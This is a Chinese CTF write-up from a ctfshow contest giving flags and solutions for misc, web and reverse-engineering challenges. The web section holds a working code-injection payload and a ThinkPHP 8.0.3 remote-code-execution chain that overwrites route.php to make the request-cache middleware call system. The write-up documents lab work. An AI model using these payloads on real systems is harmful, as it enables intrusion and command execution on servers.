misc
二维码拼图
ctfshow{2408979e-b2be-4442-b4d9-679ccb5b8298}
web
CodeInject
1=system("cat /000f1ag.txt")
ctfshow{375b20aa-248f-421d-b570-cfdbf5fab5d6}
tpdoor
给了部分源码
<?php
namespace app\controller;
use app\BaseController;
use think\facade\Db;
class Index extends BaseController
{
protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];
public function index($isCache = false , $cacheTime = 3600)
{
if($isCache == true){ //弱类型
$config = require __DIR__.'/../../config/route.php';
$config['request_cache_key'] = $isCache;
$config['request_cache_expire'] = intval($cacheTime);
$config['request_cache_except'] = [];
file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
return 'cache is enabled';
}else{
return 'Welcome ,cache is disabled';
}
}
}
报错发现版本为V8.0.3
21行关键位置,文件写入,估计是利用route.php
查看thinkphp源码
/config/route.php
通过
$config = require __DIR__.'/../../config/route.php';
$config['request_cache_key'] = $isCache;
GET传参isCache
改变$config
中request_cache_key
对应值,然后通过 file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
覆写进route.php
在中间件WWW\tp\vendor\topthink\framework\src\think\middleware\CheckRequestCache.php中,每次请求都会读取route.php
中request_cache_key
对应值,赋给$key
再传入parseCacheKey函数
而parseCacheKey中
if (true === $key) {
// 自动缓存功能
$key = '__URL__';
} elseif (str_contains($key, '|')) {
[$key, $fun] = explode('|', $key);
}
及
if (isset($fun)) {
$key = $fun($key);
}
$key
通过 explode
函数分割‘|’前$key
后$fun
,构造[参数]|[可变函数]
执行RCE
因此,我们先get传一次?isCache=ls /|system
覆写进route.php
再任意请求一次传入中间件CheckRequestCache.php中parseCacheKey函数执行
发现只能执行一次,后续无论怎么请求都是执行ls /
,其实是全局请求缓存有效时间被固定3600s写入config了
每次传的时候设置一下cacheTime就行,如
?isCache=ls%20/|system&cacheTime=3
ctfshow{0a2bb4b0-ec7c-404f-abc5-ffa9b4bbef8b}
RE
pe
修复pe头可以获flag
CTFShow{i95f5417b37c5e8019372de8737fI}
一个西瓜切两半你一半我一半
pyc逆向
正宗太极: 一个西瓜切两半你一半我一半
乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤
#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6
flag = 'ctfshow{this_is_fake_flag}'
key = '这是假的密钥'
tmp = ''
for i in flag:
tmp += chr(ord(i) - 32)
crypt = ''
for i in range(len(tmp)):
crypt += chr(ord(tmp[i]) + ord(key[i % len(key)]))
print(crypt)
解密
crypt = '乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤'
key = '一个西瓜切两半你一半我一半'
# Step 1: Decrypt using key
tmp = ''
for i in range(len(crypt)):
tmp += chr(ord(crypt[i]) - ord(key[i % len(key)]))
# Step 2: Reverse ASCII offset
flag = ''
for i in range(len(tmp)):
flag += chr(ord(tmp[i]) + 32)
print(flag) # Output: ctfshow{this_is_fake_flag}
ctfshow{Hell0_Reverse_Qi@n_D@0}
easy_re
探索进制的奥秘
CTFShow{Thank_CTFSHOW_Sky}
E
逆个🥚
本来盲猜换表,没想到直接base64
CTFSHOW{JIAMI_SHOW_YAN}
总结
web手web是做不了一点,RE倒是差点AK,果然,我不配当web手,重生之我是re手